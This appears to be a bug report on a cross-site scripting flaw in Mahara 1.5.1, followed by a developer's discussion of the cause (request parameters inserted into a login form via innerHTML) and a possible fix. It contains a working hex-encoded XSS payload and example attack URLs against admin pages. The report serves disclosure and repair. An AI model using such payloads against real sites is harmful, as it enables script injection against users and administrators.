Discovered by Emanuel Bronshtein, present in all versions.
parameters from URI are passed to javascript innerHTML without proper encoding, it possible to use some encoding inside javascript strings, as:
\x22\x3E = ">
\u0022\u003E = ">
by using this encoding it possible to trigger XSS.
Payload:
"><h1>XSS</h1><img src=9 onerror=alert("XSS")> = \x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
XSS Example:
http://localhost/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/changeuser.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
http://localhost/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/bulk.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
---
When a logged-out user tries to access a page that requires them to be logged in, a login form is generated, all get parameters are added to the form's action attribute & all post parameters are added as hidden elements inside the form. The login form is then inserted into the dom using innerHTML. This is for convenience, to let the user continue whatever it was they were trying to do if, for example, their session expired. I think it may be enough to url encode each query parameter name & value in the action url before generating the form, but haven't tested this yet.
This appears to fix it for me, but I'd appreciate some more opinions.
I think we also need to have a good look through all the innerHTML calls, because this is not necessarily restricted to the login form. I think 'Pieform' forms with jsform = true are doing the right thing though.